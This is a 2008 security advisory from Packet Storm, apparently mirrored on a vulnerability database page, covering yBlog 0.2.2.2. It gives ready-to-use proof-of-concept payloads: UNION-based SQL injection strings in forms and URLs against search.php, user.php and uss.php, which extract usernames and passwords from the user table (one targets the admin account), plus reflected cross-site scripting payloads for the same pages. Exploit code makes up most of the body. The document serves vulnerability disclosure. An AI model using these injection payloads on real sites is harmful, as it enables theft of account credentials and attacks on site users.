Lucene search

K

yblog-multi.txt

🗓️ 11 Jun 2008 00:00:00Reported by unohopeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

yBlog 0.2.2.2 Multiple Remote Vulnerabilities, unohope, SQL Injection, Cross-Site Scriptin

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
` _____ _ _ _____ _____ _____ _____   
/ ___| |_| | _ \| _ | _ |_ _|   
| (___| _ | [_)_/| (_) | (_) | | |   
\_____|_| |_|_| |_||_____|_____| |_|   
C. H. R. O. O. T. SECURITY GROUP  
- -- ----- --- -- -- ---- --- -- -   
http://www.chroot.org  
  
_ _ _ _____ ____ ____ __ _   
Hacks In Taiwan | |_| | |_ _| __| | \| |  
Conference 2008 | _ | | | | | (__| () | |  
|_| |_|_| |_| \____|____|_|\__|  
http://www.hitcon.org  
  
  
Title =======:: yBlog 0.2.2.2 Multiple Remote Vulnerabilities  
  
Author ======:: unohope [at] chroot [dot] org  
  
IRC =========:: irc.chroot.org #chroot  
  
ScriptName ==:: yBlog  
  
Download ====:: http://nchc.dl.sourceforge.net/sourceforge/y-blog/yblog-0.2.2.2.tar.gz  
  
Mirror ======:: http://www.badongo.com/file/9705849  
  
______________________  
[SQL Injection]  
  
- {search.php} -  
  
<form action="http://localhost/yblog/search.php" method="post">  
<input type="hidden" name="q" value="' union select 0,1,2,3,usuario,5,6,7,8,9,10,password,12,13,14,15,16 from usuarios/*">  
<input type="submit" value="send">  
</form>  
  
<form action="http://localhost/yblog/search.php" method="post">  
<input type="hidden" name="cn" value="1">  
<input type="hidden" name="q" value="' union select 0,1,2,3,usuario,5,6,7,8,9,10,password,12,13,14,15,16 from usuarios/*">  
<input type="submit" value="send">  
</form>  
  
- {user.php} -  
  
http://localhost/yblog/user.php?n=-99'+union+select+0,1,2,3,usuario,password,6,7,8,9,10,11,12,13,14,15,16+from+usuarios/*  
  
- {uss.php} -  
  
http://localhost/yblog/uss.php?action=2&done=1&n=-99'+union+select+0,1,2,usuario,password,5,6,7,8,9,10,11,12,13,14,15,16+from+usuarios+where+usuario='adm'/*  
  
______________________  
[Cross-Site Scripting]  
  
- {search.php} -  
  
<form action="http://localhost/yblog/search.php" method="post">  
<input type="hidden" name="q" value="<script>alert(/xss/)</script>">  
<input type="submit" value="send">  
</form>  
  
- {user.php} -  
  
http://localhost/yblog/user.php?n=<script>alert(/xss/)</script>  
  
- {uss.php} -   
  
http://localhost/yblog/uss.php?action=2&done=1&n=<script>alert(/xss/)</script>  
  
______  
[NOTE]  
  
!! This is just for educational purposes, DO NOT use for illegal. !!  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo